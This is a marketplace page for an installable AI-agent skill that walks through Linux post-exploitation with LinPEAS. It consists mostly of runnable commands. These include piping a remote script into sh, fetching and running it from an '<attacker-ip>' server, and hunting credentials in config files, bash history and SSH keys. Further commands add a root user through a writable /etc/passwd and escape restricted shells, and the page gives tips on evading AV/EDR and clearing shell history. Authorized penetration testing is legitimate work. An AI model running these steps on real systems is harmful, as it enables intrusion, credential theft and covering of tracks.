agentsecops/privesc-linpeas
skills/offsec/privesc-linpeas/SKILL.md
Linux privilege escalation enumeration and attack surface analysis using LinPEAS (Linux Privilege Escalation Awesome Script). Automates post-exploitation discovery of escalation vectors, misconfigurations, and credential exposure on Linux targets. Use when: (1) Enumerating privilege escalation vectors after initial access on a Linux system, (2) Identifying SUID/SGID binaries, sudo misconfigurations, and capability abuses, (3) Hunting for credentials in config files, history, and logs, (4) Detecting container breakout opportunities and writable service files, (5) Mapping kernel exploits and CVE exposure for a target system, (6) Conducting authorized CTF, red team, or penetration test post-exploitation phases.
$ install --global
skillsauthnpx skillsauth add agentsecops/secopsagentkit privesc-linpeasInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Apr 16, 2026, 9:23 AM9.6s5 files scanned
SKILL.md
- name:
- privesc-linpeas
- description:
- >
- Use when:
- (1) Enumerating privilege escalation vectors after initial access on a
- version:
- 0.1.0
- maintainer:
- SirAppSec
- category:
- offsec
- tags:
- [privesc, linpeas, post-exploitation, linux, enumeration, red-team, privilege-escalation]
- frameworks:
- [MITRE-ATT&CK, PTES]
- tools:
- [curl, bash, python3]
- optional:
- [wget]
- - https:
- //attack.mitre.org/tactics/TA0007/
LinPEAS Linux Privilege Escalation
Overview
LinPEAS (Linux Privilege Escalation Awesome Script) is the most comprehensive automated enumeration tool for identifying privilege escalation vectors on Linux systems. It checks 200+ attack vectors, color-codes findings by severity, and maps results to GTFOBins and MITRE ATT&CK.
IMPORTANT: Use only on systems where you have explicit written authorization. Unauthorized use constitutes computer fraud. All actions should be conducted within defined engagement scope.
Quick Start
# Download and run LinPEAS directly (no-install, in-memory)
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Save output for analysis
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -o /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh -a 2>&1 | tee /tmp/linpeas_output.txt
# Stealth / faster scan (skips time-consuming checks)
/tmp/linpeas.sh -s 2>&1 | tee /tmp/linpeas_fast.txt
Script variants (choose based on environment):
linpeas.sh— default, includes linux exploit suggesterlinpeas_fat.sh— embeds third-party tools (no internet needed on target)linpeas_small.sh— essential checks only, smallest footprint
Use scripts/linpeas_runner.py for structured JSON output and automated triage.
Core Workflow
Post-Exploitation Enumeration Workflow
Progress:
[ ] 1. Verify authorization and document scope
[ ] 2. Transfer or fetch LinPEAS to target (curl, wget, or scp)
[ ] 3. Execute scan: ./linpeas.sh -a 2>&1 | tee linpeas_output.txt
[ ] 4. Triage findings by severity (RED = critical, YELLOW = medium)
[ ] 5. Validate top vectors manually before exploitation
[ ] 6. Attempt privilege escalation using highest-confidence vector
[ ] 7. Verify privilege level: id && whoami
[ ] 8. Document exploitation path and clean up artifacts
Severity Color Guide
| Color | Meaning | |---------|------------------------------------------------------| | RED+ | 95% escalation probability (exploit immediately) | | RED | High confidence vector (validate then exploit) | | YELLOW | Interesting finding (requires manual review) | | GREEN | Low-risk information |
Targeted Scans (Faster Execution)
# SUID/SGID binaries only
find / -perm -4000 -o -perm -2000 2>/dev/null | xargs ls -la
# Sudo permissions
sudo -l
# Running processes and services
ps aux && systemctl list-units --type=service --state=running
# Capabilities
/usr/sbin/getcap -r / 2>/dev/null
# Writable paths in PATH
echo $PATH | tr ':' '\n' | xargs -I{} find {} -writable -type f 2>/dev/null
# Cron jobs
cat /etc/crontab; ls -la /etc/cron.*; crontab -l 2>/dev/null
# Network connections and open ports
ss -tulpn; netstat -tulpn 2>/dev/null
Key Attack Vectors
See references/privesc_vectors.md for detailed exploitation steps per vector.
Tier 1: High-Confidence Escalation Paths
Sudo Misconfigurations
sudo -l
# Look for: NOPASSWD entries, unrestricted shells, wildcard abuse
# GTFOBins: https://gtfobins.github.io/
SUID Binaries
find / -perm -u=s -type f 2>/dev/null
# Cross-reference with GTFOBins for exploitation techniques
Writable /etc/passwd or /etc/shadow
ls -la /etc/passwd /etc/shadow
# If writable: add root user with known hash
Kernel Exploits
uname -r && cat /etc/os-release
# Use linpeas output: check CVE suggestions for kernel version
Tier 2: Credential Hunting
# Bash history
cat ~/.bash_history; find / -name ".bash_history" 2>/dev/null | xargs cat
# Config files with passwords
grep -r "password\|passwd\|secret\|token" /etc /opt /var/www 2>/dev/null --include="*.conf" --include="*.cfg" --include="*.ini"
# SSH keys
find / -name "id_rsa" -o -name "id_ecdsa" 2>/dev/null
Tier 3: Container / Environment Breakout
# Detect container environment
cat /proc/1/cgroup | grep -i docker
ls /.dockerenv 2>/dev/null
env | grep -i kube
# Check for privileged container
cat /proc/self/status | grep CapEff
# Full capabilities (0000003fffffffff) = privileged container
See references/mitre_mapping.md for MITRE ATT&CK technique mappings.
Security Considerations
- Authorization: Obtain explicit written authorization before running. Document engagement scope.
- Sensitive Data: LinPEAS output contains credentials, hashes, and keys — treat as highly sensitive. Encrypt at rest, delete after engagement.
- Audit Logging: Log all commands executed with timestamps in engagement notes. Some blue teams monitor for LinPEAS signatures.
- OPSEC: In red team engagements, consider evasion — see references for obfuscation techniques. Run from tmpfs (
/dev/shm) to avoid disk artifacts. - Cleanup: Remove LinPEAS binary and output files after the engagement. Clear relevant shell history entries.
- Compliance: Activities must comply with engagement rules of engagement, SOW, and applicable laws (CFAA, Computer Misuse Act, etc.).
Bundled Resources
Scripts (scripts/)
linpeas_runner.py— Automates LinPEAS fetch, execution, output parsing, and JSON report generation with severity triage
References (references/)
privesc_vectors.md— Detailed exploitation steps for common Linux privesc vectors (SUID, sudo, crons, capabilities, NFS, LD_PRELOAD, PATH hijacking)mitre_mapping.md— MITRE ATT&CK technique mappings for each enumerated vector
Assets (assets/)
linpeas_report_template.md— Engagement report template for documenting privilege escalation findings
Integration Points
- Post-Metasploit: Run after initial Meterpreter shell via
shellcommand orpost/multi/manage/shell_to_meterpreter - Post-Nmap: Use after
recon-nmapidentifies live Linux targets - CI/CD Security Testing: Integrate into automated purple team pipelines to validate privilege escalation mitigations
- Reporting: Feed
linpeas_runner.pyJSON output into CVSS scoring and risk documentation
Troubleshooting
Issue: AV or EDR blocks LinPEAS execution
Solution: Use the Python/PSPY alternative or compile a custom version.
# Run from memory (no disk write)
curl -sL <url> | bash
# Or use pspy for process monitoring only
./pspy64
Issue: Restricted shell (rbash, no /bin/bash)
Solution: Escape restricted shell before running enumeration.
# Try common bypasses
python3 -c 'import pty; pty.spawn("/bin/bash")'
vi -c ':!/bin/bash'
awk 'BEGIN {system("/bin/bash")}'
Issue: No internet access on target
Solution: Transfer LinPEAS via the attacker machine.
# On attacker (Python HTTP server)
python3 -m http.server 8080
# On target
wget http://<attacker-ip>:8080/linpeas.sh -O /tmp/lp.sh && chmod +x /tmp/lp.sh && /tmp/lp.sh
References
- LinPEAS GitHub
- HackTricks Linux Privesc
- GTFOBins
- MITRE ATT&CK TA0004 Privilege Escalation
- MITRE ATT&CK TA0007 Discovery
- PayloadsAllTheThings Linux Privesc
Related Skills
agentsecops/ot-security-assessment
development
VerifiedTrustedCommunity
Operational Technology (OT) security assessment using a two-stage methodology: (1) Identification/Discovery of OT devices and protocols, and (2) Vulnerability Assessment using online sources and Metasploit. Use when: (1) Conducting authorized OT/ICS security assessments, (2) Identifying and enumerating OT protocols (Modbus, S7, IEC 104, DNP3, BACnet, EtherNet/IP), (3) Discovering industrial control devices and PLCs, (4) Assessing OT protocol vulnerabilities and security weaknesses, (5) Performing compliance scanning aligned with IEC 62443 standards, (6) Validating network segmentation and access controls in OT environments.
110SKILL.mdUpdated Apr 16, 2026
agentsecops/vuln-defectdojo
tools
VerifiedTrustedCommunity
Vulnerability management and findings aggregation using DefectDojo. Centralizes security findings from all SecOpsAgentKit scanners (Semgrep, Bandit, ZAP, Trivy, Grype, Gitleaks, Nuclei, Checkov, Horusec) into a unified platform with automatic deduplication, SLA tracking, risk-based prioritization, and compliance reporting. Use when: (1) Aggregating findings from multiple scanners across products and pipelines, (2) Tracking remediation status and SLA compliance against policy thresholds, (3) Deduplicating overlapping findings across security tools, (4) Generating vulnerability reports for compliance audits (SOC2, PCI-DSS, GDPR), (5) Managing security debt and vulnerability backlog across teams and applications.
110SKILL.mdUpdated Apr 16, 2026
agentsecops/pytm
tools
VerifiedTrustedCommunity
Python-based threat modeling using pytm library for programmatic STRIDE analysis, data flow diagram generation, and automated security threat identification. Use when: (1) Creating threat models programmatically using Python code, (2) Generating data flow diagrams (DFDs) with automatic STRIDE threat identification, (3) Integrating threat modeling into CI/CD pipelines and shift-left security practices, (4) Analyzing system architecture for security threats across trust boundaries, (5) Producing threat reports with STRIDE categories and mitigation recommendations, (6) Maintaining threat models as code for version control and automation.
82SKILL.mdUpdated Mar 27, 2026
agentsecops/sbom-syft
development
VerifiedTrustedCommunity
Software Bill of Materials (SBOM) generation using Syft for container images, filesystems, and archives. Detects packages across 28+ ecosystems with multi-format output support (CycloneDX, SPDX, syft-json). Enables vulnerability assessment, license compliance, and supply chain security. Use when: (1) Generating SBOMs for container images or applications, (2) Analyzing software dependencies and packages for vulnerability scanning, (3) Tracking license compliance across dependencies, (4) Integrating SBOM generation into CI/CD for supply chain security, (5) Creating signed SBOM attestations for software provenance.
82SKILL.mdUpdated Mar 27, 2026